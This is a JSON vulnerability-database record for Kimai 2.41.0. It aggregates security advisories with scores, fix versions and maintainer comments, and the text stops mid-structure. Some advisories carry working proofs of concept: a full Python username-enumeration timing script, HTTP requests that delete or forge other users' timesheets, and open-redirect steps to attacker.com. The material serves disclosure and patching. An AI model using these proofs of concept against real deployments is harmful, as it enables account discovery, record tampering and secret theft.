{"url":"http://public2.vulnerablecode.io/api/packages/926250?format=json","purl":"pkg:composer/kimai/kimai@2.41.0","type":"composer","namespace":"kimai","name":"kimai","version":"2.41.0","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"2.56.0","latest_non_vulnerable_version":"2.56.0","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/67670?format=json","vulnerability_id":"VCID-4a1w-d47t-y3df","summary":"Kimai is an open-source time tracking application. From version 2.32.0 to before version 2.56.0, users with the role System-Admin (ROLE_SYSTE_ADMIN) and the permission upload_invoice_template can upload PDF invoice templates, which can call pdfContext.setOption('associated_files', ...) inside the sandboxed Twig render. This is forwarded to mPDF's SetAssociatedFiles(), whose writer calls file_get_contents($entry['path']) during PDF output and embeds the bytes as a FlateDecode stream in the PDF. Any file readable by the PHP worker is returned to the attacker inside the rendered invoice. 
This issue has been patched in version 2.56.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44298","reference_id":"","reference_type":"","scores":[{"value":"0.00078","scoring_system":"epss","scoring_elements":"0.23278","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44298"},{"reference_url":"https://github.com/kimai/kimai","reference_id":"","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44298","reference_id":"","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44298"},{"reference_url":"https://github.com/kimai/kimai/releases/tag/2.56.0","reference_id":"2.56.0","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-08T14:06:21Z/"}],"url":"https://github.com/kimai/kimai/releases/tag/2.56.0"},{"reference_url":"https://github.com/advisories/GHSA-h5fh-7hwr-97mw","reference_id":"GHSA-h5fh-7hwr-97mw","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-h5fh-7hwr-97mw"},{"reference_url":"https://github.com/kimai/kimai/security/advisories/GHSA-h5fh-7hwr-97mw","reference_id":"GHSA-h5fh-7hwr-97mw","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N
"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-08T14:06:21Z/"}],"url":"https://github.com/kimai/kimai/security/advisories/GHSA-h5fh-7hwr-97mw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/375853?format=json","purl":"pkg:composer/kimai/kimai@2.56.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/kimai/kimai@2.56.0"}],"aliases":["CVE-2026-44298","GHSA-h5fh-7hwr-97mw"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4a1w-d47t-y3df"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/360415?format=json","vulnerability_id":"VCID-6as9-19am-2uga","summary":"Kimai has Missing Voter Check that Allows Cross-Team Timesheet Manipulation\n### Summary\n\nAny ROLE_TEAMLEAD user can enumerate, read, modify, and permanently delete timesheets belonging to any other user in the system — regardless of team membership. This enables data destruction (deleted billable hours), data tampering (forged timesheet durations), and full authorization bypass on timesheet resources. Verified against Kimai 2.52.0.\n\n### Details\n\n`TimesheetVoter::voteOnAttribute()` maps permissions to `own_timesheet` or `other_timesheet` without checking team membership. 
The voter's own comment confirms this is a known gap:\n\n```php\n// extend me for \"team\" support later on\nif ($subject->getUser()?->getId() === $user->getId()) {\n    $permission .= 'own';\n} else {\n    $permission .= 'other';\n}\n```\n\n### PoC\n\nTested against Kimai 2.52.0 Docker instance.\n\nSetup:\n- User A (usera, ROLE_TEAMLEAD) owns timesheet ID 2 with description \"Private timesheet - UserA only\"\n- User B (userb, ROLE_TEAMLEAD) is NOT on any team with User A\n\n**User B reads User A's timesheet data:**\n\n```\nGET /api/timesheets/2 HTTP/1.1\nX-AUTH-USER: userb\nX-AUTH-TOKEN: <userb_api_token>\n```\n\nResponse: HTTP 200 — returns full timesheet record including description \"Private timesheet - UserA only\".\n\n**User B deletes User A's timesheet:**\n\n```\nDELETE /api/timesheets/3 HTTP/1.1\nX-AUTH-USER: userb\nX-AUTH-TOKEN: <userb_api_token>\n```\n\nResponse: HTTP 204 No Content — timesheet permanently deleted.\n\n**User B tampers User A's timesheet:**\n\n```\nPATCH /api/timesheets/6 HTTP/1.1\nX-AUTH-USER: userb\nX-AUTH-TOKEN: <userb_api_token>\nContent-Type: application/json\n\n{\"begin\":\"2026-03-24T08:00:00\",\"end\":\"2026-03-24T18:00:00\",\"project\":1,\"activity\":1,\"description\":\"TAMPERED\",\"exported\":false,\"billable\":false}\n```\n\nResponse: HTTP 200 OK — duration inflated from 3600s to 36000s, description overwritten.\n\n**Note:** ROLE_USER (userc) is correctly blocked — DELETE returns 403 and the actions endpoint returns an empty array. The vulnerability only affects ROLE_TEAMLEAD and above. Timesheet IDs are sequential integers, trivially enumerable.\n\n### Impact\n\nAny authenticated user with ROLE_TEAMLEAD or above can:\n\n1. Permanently delete timesheets belonging to any user system-wide — destroying billable hours, payroll data, and project billing history\n2. Silently alter timesheet descriptions, hours, and billing flags — forging hours up or down, directly affecting invoicing and payroll\n3. 
Enumerate all timesheet IDs (sequential integers) and access action metadata for arbitrary records\n\nNo user interaction required. ROLE_USER accounts are correctly restricted; the vulnerability is specific to ROLE_TEAMLEAD receiving global scope instead of team-scoped access.\n\n### Maintainers' answer: why this is not eligible for a CVE\n\nThe behavior described matches the documented permission model. Per the Kimai documentation, the relevant permissions granted to `ROLE_TEAMLEAD` are:\n\n- `edit_other_timesheet` — Edit existing records of other users\n- `delete_other_timesheet` — Delete existing records of other users\n\nThese permissions were global by design, not team-scoped. The UI surfaces only the teamlead's own team timesheets, but the API has historically honored these permissions as documented: a role holding `*_other_timesheet` can act on any other user's timesheet. The inline comment `// extend me for \"team\" support later on` reflects this accurately — team-scoped enforcement was a planned enhancement, not a security control that existed and failed.\n\nThe report frames this as authorization bypass, but no authorization boundary is being crossed: `ROLE_TEAMLEAD` is operating within its documented permissions.\n\nKimai acknowledges that this behavior might not be expected, so while it will be treated as a feature request for team-scoped permission enforcement and not a vulnerability, it still tracks it as having security implications.\n\n### Solution\n\nTeam-scoped timesheet permission checks were added in 2.56.0.\n\nOperators of Kimai <= 2.55 who need stricter isolation between teamleads should not grant `ROLE_TEAMLEAD` to users who must not act on other teams' 
timesheets.","references":[{"reference_url":"https://github.com/kimai/kimai","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai"},{"reference_url":"https://github.com/kimai/kimai/security/advisories/GHSA-9g2q-w3w2-vf7q","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai/security/advisories/GHSA-9g2q-w3w2-vf7q"},{"reference_url":"https://github.com/advisories/GHSA-9g2q-w3w2-vf7q","reference_id":"GHSA-9g2q-w3w2-vf7q","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-9g2q-w3w2-vf7q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/375853?format=json","purl":"pkg:composer/kimai/kimai@2.56.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/kimai/kimai@2.56.0"}],"aliases":["GHSA-9g2q-w3w2-vf7q"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-6as9-19am-2uga"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/69152?format=json","vulnerability_id":"VCID-8vkc-r8z8-7ugb","summary":"Kimai is a web-based multi-user time-tracking application. Prior to version 2.51.0, \"GET /api/invoices/{id}\" only checks the role-based view_invoice permission but does not verify the requesting user has access to the invoice's customer. Any user with ROLE_TEAMLEAD (which grants view_invoice) can read all invoices in the system, including those belonging to customers assigned to other teams. 
This issue has been patched in version 2.51.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28685","reference_id":"","reference_type":"","scores":[{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.03085","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28685"},{"reference_url":"https://github.com/kimai/kimai","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai"},{"reference_url":"https://github.com/kimai/kimai/releases/tag/2.51.0","reference_id":"2.51.0","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-09T19:46:43Z/"}],"url":"https://github.com/kimai/kimai/releases/tag/2.51.0"},{"reference_url":"https://github.com/kimai/kimai/commit/a0601c8cb28fed1cca19051a8272425069ab758f","reference_id":"a0601c8cb28fed1cca19051a8272425069ab758f","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-09T19:46:43Z/"}],"url":"https://github.com/kimai/kimai/commit/a0601c8cb28fed1cca19051a8272425069ab758f"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28685","reference_id":"CVE-2026-28685","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},
{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28685"},{"reference_url":"https://github.com/advisories/GHSA-v33r-r6h2-8wr7","reference_id":"GHSA-v33r-r6h2-8wr7","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-v33r-r6h2-8wr7"},{"reference_url":"https://github.com/kimai/kimai/security/advisories/GHSA-v33r-r6h2-8wr7","reference_id":"GHSA-v33r-r6h2-8wr7","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-09T19:46:43Z/"}],"url":"https://github.com/kimai/kimai/security/advisories/GHSA-v33r-r6h2-8wr7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/40197?format=json","purl":"pkg:composer/kimai/kimai@2.51.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4a1w-d47t-y3df"},{"vulnerability":"VCID-6as9-19am-2uga"},{"vulnerability":"VCID-h9gw-dwmf-mfap"},{"vulnerability":"VCID-kahk-zqmm-zka9"},{"vulnerability":"VCID-kjkh-andk-qqa6"},{"vulnerability":"VCID-nxtw-3hcs-mydx"},{"vulnerability":"VCID-qvcx-4wyw-4uba"},{"vulnerability":"VCID-we4j-21ku-9yf2"},{"vulnerability":"VCID-ys8u-pn7h-ayc7"},{"vulnerability":"VCID-zfjd-s5wk-eqbz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/kimai/kimai@2.51.0"}],"aliases":["CVE-2026-28685","GHSA-v33r-r6h2-8wr7"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8vkc-r8z8-7ugb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/359828?format=json","vulnerabi
lity_id":"VCID-h9gw-dwmf-mfap","summary":"Kimai: Username enumeration via timing on X-AUTH-USER\n## Details\n\n`src/API/Authentication/TokenAuthenticator.php` calls `loadUserByIdentifier()` first and only invokes the password hasher (argon2id) when a user is returned. When the username does not exist, the request returns roughly 25 ms faster than when it does. The response body is the same in both cases (`{\"message\":\"Invalid credentials\"}`, HTTP 403), so the leak is purely timing.\n\nThe `/api/*` firewall has no `login_throttling` configured, so the probe is unbounded.\n\nThe legacy `X-AUTH-USER` / `X-AUTH-TOKEN` headers are still accepted by default in 2.x. No prior authentication, no API token, and no session cookie are required.\n\n## Proof of concept\n\n```python\n#!/usr/bin/env python3\n\"\"\"Kimai username enumeration via X-AUTH-USER timing oracle.\"\"\"\n\nimport argparse\nimport ssl\nimport statistics\nimport sys\nimport time\nimport urllib.error\nimport urllib.request\n\nPROBE_PATH = \"/api/users/me\"\nBASELINE_USER = \"baseline_no_such_user_zzz\"\nDUMMY_TOKEN = \"x\" * 32\n\n\ndef probe(url, user, ctx):\n    req = urllib.request.Request(\n        url + PROBE_PATH,\n        headers={\"X-AUTH-USER\": user, \"X-AUTH-TOKEN\": DUMMY_TOKEN},\n    )\n    t0 = time.perf_counter()\n    try:\n        urllib.request.urlopen(req, context=ctx, timeout=10).read()\n    except urllib.error.HTTPError as e:\n        e.read()\n    return (time.perf_counter() - t0) * 1000.0\n\n\ndef median_ms(url, user, samples, ctx):\n    return statistics.median(probe(url, user, ctx) for _ in range(samples))\n\n\ndef load_candidates(path):\n    with open(path) as f:\n        return [ln.strip() for ln in f if ln.strip() and not ln.startswith(\"#\")]\n\n\ndef main():\n    ap = argparse.ArgumentParser(description=__doc__.strip())\n    ap.add_argument(\"-u\", \"--url\", required=True,\n                    help=\"base URL, e.g. 
https://kimai.example\")\n    ap.add_argument(\"-l\", \"--list\", required=True, metavar=\"FILE\",\n                    help=\"one candidate username per line\")\n    ap.add_argument(\"-t\", \"--threshold\", type=float, default=15.0, metavar=\"MS\",\n                    help=\"median delta over baseline that flags a real user\")\n    ap.add_argument(\"-n\", \"--samples\", type=int, default=15)\n    ap.add_argument(\"--verify-tls\", action=\"store_true\")\n    args = ap.parse_args()\n\n    url = args.url.rstrip(\"/\")\n    ctx = None if args.verify_tls else ssl._create_unverified_context()\n    candidates = load_candidates(args.list)\n\n    baseline = median_ms(url, BASELINE_USER, args.samples, ctx)\n    print(f\"baseline: {baseline:.1f} ms\", file=sys.stderr)\n\n    width = max(len(u) for u in candidates)\n    print(f\"{'username':<{width}}  {'median':>8}  {'delta':>8}  verdict\")\n    print(\"-\" * (width + 30))\n    for user in candidates:\n        m = median_ms(url, user, args.samples, ctx)\n        delta = m - baseline\n        verdict = \"REAL\" if delta > args.threshold else \"-\"\n        print(f\"{user:<{width}}  {m:>6.1f}ms  {delta:>+6.1f}ms  {verdict}\")\n\n\nif __name__ == \"__main__\":\n    main()\n```\n\nUsage:\n\n```\n$ ./timing_oracle.py -u https://target -l users.txt -n 15\n[*] calibrating baseline with 15 samples\n[*] baseline median: 37.7 ms\n[*] probing 13 candidates (n=15, threshold=15.0 ms)\n\nusername                        median     delta  verdict\n----------------------------------------------------------\nuser1@example.com               64.2ms   +26.5ms  REAL\nuser2@example.com               72.4ms   +34.7ms  REAL\nuser3@example.com               70.0ms   +32.3ms  REAL\ntester.nonexistent@example.com  37.2ms    -0.5ms  -\nadmin                           63.6ms   +25.9ms  REAL\nadministrator                   38.2ms    +0.4ms  -\nroot                            37.3ms    -0.4ms  -\ntest                            33.6ms    -4.1ms  -\ndemo   
                         38.2ms    +0.5ms  -\nkimai                           37.0ms    -0.7ms  -\nnonexistent_user_aaa            38.1ms    +0.4ms  -\nnonexistent_user_bbb            37.5ms    -0.2ms  -\nnonexistent_user_ccc            38.4ms    +0.7ms  -\n```\n\nIn this run, four real accounts were identified out of thirteen candidates with no false positives or false negatives. Probing took roughly five seconds per username at fifteen samples each.\n\n## Fix\n\nIn `TokenAuthenticator::authenticate()`, run the password hasher against a fixed dummy hash when the user is not found, so the response time does not depend on user existence:\n\n```php\nprivate const DUMMY_HASH = '$argon2id$v=19$m=65536,t=4,p=1$ZHVtbXlzYWx0ZHVtbXk$YQ4N4lU0Sg9hRT2KhRGwLp7y4VZqkM5KQ8wYJ5HtoX0';\n\ntry {\n    $user = $this->userProvider->loadUserByIdentifier($credentials['username']);\n} catch (UserNotFoundException $e) {\n    $this->passwordHasherFactory\n        ->getPasswordHasher(User::class)\n        ->verify(self::DUMMY_HASH, $credentials['password']);\n    throw $e;\n}\n```\n\nThe dummy hash must use the same algorithm and parameters as real user hashes so that `verify()` consumes equivalent CPU. Generate it once with `password_hash('dummy', PASSWORD_ARGON2ID)` and pin it as a constant.\n\n## Relevance\n\nThe practical security impact is very limited. The response body and HTTP status are identical, and the only observable difference is a relatively small timing gap, which is even less relevant when the request is executed against a network instead of a local installation. In addition, [this authentication method has already been deprecated since April 2024 and is scheduled for removal after Q2 2026](https://www.kimai.org/en/blog/2026/removing-api-passwords), so the issue only affects a legacy mechanism that is already being phased out. 
","references":[{"reference_url":"https://github.com/kimai/kimai","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai"},{"reference_url":"https://github.com/kimai/kimai/security/advisories/GHSA-jrc6-fmhw-fpq2","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai/security/advisories/GHSA-jrc6-fmhw-fpq2"},{"reference_url":"https://github.com/advisories/GHSA-jrc6-fmhw-fpq2","reference_id":"GHSA-jrc6-fmhw-fpq2","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-jrc6-fmhw-fpq2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373714?format=json","purl":"pkg:composer/kimai/kimai@2.54.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4a1w-d47t-y3df"},{"vulnerability":"VCID-6as9-19am-2uga"},{"vulnerability":"VCID-kjkh-andk-qqa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/kimai/kimai@2.54.0"}],"aliases":["GHSA-jrc6-fmhw-fpq2"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-h9gw-dwmf-mfap"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/359943?format=json","vulnerability_id":"VCID-kahk-zqmm-zka9","summary":"Kimai has an Open Redirect via Unvalidated RelayState in SAML ACS Handler\n### Summary\n\nThe SAML authentication success handler in Kimai returns the `RelayState` POST parameter as a redirect destination without validating the host or scheme. 
After a user successfully authenticates via SAML, they are redirected to an attacker-controlled URL if the IdP includes a malicious `RelayState` value. This enables phishing attacks that steal credentials or session tokens post-SSO.\n\n*Requires SAML to be enabled (non-default configuration).*\n\n### Details\n\nVulnerable file: `src/Saml/Security/SamlAuthenticationSuccessHandler.php`\n\n```php\n// Line 27-33\n$relayState = $request->request->get('RelayState', $request->query->get('RelayState'));\nif (\\is_scalar($relayState)) {\n    $relayState = (string) $relayState;\n    if ($relayState !== $this->httpUtils->generateUri($request, (string) $this->options['login_path'])) {\n        return $relayState;  // No host/scheme validation — any URL accepted\n    }\n}\n```\n\nThe only check is that `RelayState` does not equal the configured `login_path`. Any external URL (e.g., `https://attacker.com`) passes this check and is returned as the redirect destination.\n\nThe existing unit test `SamlAuthenticationSuccessHandlerTest::testRelayState()` confirms this behavior — an absolute URL in `RelayState` results in a redirect to that URL with no restriction.\n\n### Steps to Reproduce\n\n```\n1. Enable SAML authentication in Kimai\n2. Configure a SAML IdP (e.g., SimpleSAMLphp)\n3. Initiate IdP-initiated SSO with RelayState=https://attacker.com\n   — or intercept the ACS POST and modify RelayState to https://attacker.com\n4. Complete SAML authentication at the IdP\n5. Observe: after the SAMLResponse POST to /saml/acs, Kimai issues:\n   HTTP/1.1 302 Found\n   Location: https://attacker.com\n```\n\nCode-confirmed via unit test (`testRelayState`): `onAuthenticationSuccess` with `RelayState=http://localhost/relayed` redirects directly to that URL. 
External URLs follow the same code path.\n\n### Impact\n\nWhile this bug exists it has low practical possibilities and the attacker needs to be able to create a SAML request, meaning either admin access to an IdP supporting such an action OR access to the private SAML keys / certificates.\n\nIn other words: only exploitable in IdP-initiated SSO flows where the IdP includes a `RelayState` value supplied by the attacker (e.g., via a malicious link to the IdP).\n\n### Fix\n\nThe `RelayState` is validated before redirecting, see #5878\n\n- It may not contain a host or port and cannot start with `//`. \n- If it contains a host, it must match the current host.","references":[{"reference_url":"https://github.com/kimai/kimai","reference_id":"","reference_type":"","scores":[{"value":"0.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai"},{"reference_url":"https://github.com/kimai/kimai/pull/5878","reference_id":"","reference_type":"","scores":[{"value":"0.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai/pull/5878"},{"reference_url":"https://github.com/kimai/kimai/security/advisories/GHSA-3jp4-mhh4-gcgr","reference_id":"","reference_type":"","scores":[{"value":"0.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai/security/advisories/GHSA-3jp4-mhh4-gcgr"},{"reference_url":"https://github.com/advisories/GHSA-3jp4-mhh4-gcgr","reference_id":"GHSA-3jp4-mhh4-gcgr","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-3jp4-mhh4-gcgr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io
/api/packages/373484?format=json","purl":"pkg:composer/kimai/kimai@2.53.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4a1w-d47t-y3df"},{"vulnerability":"VCID-6as9-19am-2uga"},{"vulnerability":"VCID-h9gw-dwmf-mfap"},{"vulnerability":"VCID-kjkh-andk-qqa6"},{"vulnerability":"VCID-qvcx-4wyw-4uba"},{"vulnerability":"VCID-we4j-21ku-9yf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/kimai/kimai@2.53.0"}],"aliases":["GHSA-3jp4-mhh4-gcgr"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kahk-zqmm-zka9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/360362?format=json","vulnerability_id":"VCID-kjkh-andk-qqa6","summary":"Kimai's Twig function config() leaks server-wide secrets (LDAP bind password, SAML SP private key) via invoice/export templates\n### Summary\n\nKimai's Twig sandbox (`StrictPolicy`, used for admin-uploaded invoice and export templates) allow-lists the `config()` Twig function with no key filtering. `config(name)` delegates to `App\\Configuration\\SystemConfiguration::find($name)`, which returns arbitrary entries from the flattened `kimai.config` container parameter built in `App\\DependencyInjection\\AppExtension::loadInternal()`. Any admin who can upload a Twig template can therefore render server-wide secrets - the LDAP bind password, the SAML SP private key, and any other dotted configuration key populated from `kimai.yaml` - into the invoice or export output, which is then delivered to whoever generates an invoice or export from that template (including lower-privileged users such as teamleads with invoice permissions). 
This is a second, uncovered class of the same defense-in-depth issue patched in GHSA-rh42-6rj2-xwmc: the previous fix added a User-method blocklist but left the `config()` function unrestricted.\n\n### Details\n\n`src/Twig/SecurityPolicy/StrictPolicy.php:40-55` explicitly allow-lists `'config'`:\n\n```php\nprivate array $allowedFunctions = [\n    'max', 'min', 'range', 'constant', 'cycle', 'random', 'date',\n    't',\n    'encore_entry_css_source', 'encore_entry_link_tags', 'encore_entry_script_tags',\n    'is_granted',\n    'qr_code_data_uri',\n    'config',                       // <-- sink, no key filter\n    'create_date', 'month_names', 'locale_format',\n    'class_name'\n];\n```\n\n`src/Twig/Configuration.php:22-45` is the Twig function implementation:\n\n```php\npublic function getFunctions(): array\n{\n    return [new TwigFunction('config', [$this, 'get'])];\n}\n\npublic function get(string $name)\n{\n    switch ($name) {\n        case 'chart-class':                     return '';\n        case 'theme.chart.background_color':    return '#3c8dbc';\n        // ... 4 more theme constants\n    }\n    return $this->configuration->find($name);   // <-- arbitrary key lookup\n}\n```\n\n`App\\Configuration\\SystemConfiguration::find()` at `src/Configuration/SystemConfiguration.php:54-62` is a direct dictionary lookup. 
The dictionary `$this->settings` is initialised from the `kimai.config` container parameter, which the `AppExtension` flattens from `kimai.yaml` into dotted-notation keys.\n\nThe LDAP and SAML schemas declared in `src/DependencyInjection/Configuration.php` define secret-valued scalar nodes that survive the flattening and become reachable keys:\n\n```php\n// getLdapNode()\n->arrayNode('connection')\n    ->children()\n        ->scalarNode('host')->defaultNull()->end()\n        ->scalarNode('username')->end()\n        ->scalarNode('password')->end()       // -> settings['ldap.connection.password']\n        ...\n\n// getSamlNode()\n->arrayNode('sp')\n    ->children()\n        ->scalarNode('x509cert')->end()\n        ->scalarNode('privateKey')->end()     // -> settings['saml.connection.sp.privateKey']\n        ...\n```\n\nThe invoice and export renderers both enable the sandbox against `StrictPolicy` and pass the shared Twig environment - the one with the `config` function registered - into sandboxed rendering: `src/Invoice/Renderer/AbstractTwigRenderer.php:66-74` and `src/Export/Base/{PDFRenderer,HtmlRenderer}.php`. An admin who uploads a malicious invoice or export template therefore gets an unrestricted read primitive against `kimai.config`.\n\nIn a real deployment the attacker template is uploaded through the admin UI (ROLE_SUPER_ADMIN, permission `upload_invoice_template`), saved by `src/Invoice/InvoiceTemplate*` and later rendered by whoever generates an invoice or export for that template. The rendering user is typically a teamlead or admin with invoice permission (`INVOICE` permission set: `['view_invoice','create_invoice','manage_invoice_template']`, granted to ROLE_ADMIN and ROLE_TEAMLEAD in `config/packages/kimai.yaml`). 
The rendered output is returned as the invoice PDF/HTML or as a CSV/XLSX export, so the secrets land in a document that is routinely downloaded and emailed.\n\n### Impact\n\nAny Kimai deployment that (a) has SAML or LDAP configured in `kimai.yaml`, and (b) has at least one user (other than the current SUPER_ADMIN) who will render a template-based invoice or export in the future, is affected. A malicious or compromised SUPER_ADMIN can upload a template once, leave, and subsequent invoice or export generations by teamleads or other admins silently exfiltrate `ldap.connection.password`, `saml.connection.sp.privateKey`, `saml.connection.sp.x509cert`, and any other dotted configuration key into an attacker-readable artifact. The LDAP bind password gives domain-credential access to the company directory and often to every downstream system that trusts the same directory; the SAML SP private key allows an attacker to forge signed SAML assertions to any service provider that trusts the same key pair. This is the same class of defense-in-depth leak that GHSA-rh42-6rj2-xwmc patched for user-level secrets, at a broader impact because the keys leaked here are system-wide rather than per-user, and the current StrictPolicy does not intercept the `config()` call path. \n\n### Solution\n\nThe `config()` function was patched to only return a pre-configured list of settings in sandboxed mode. 
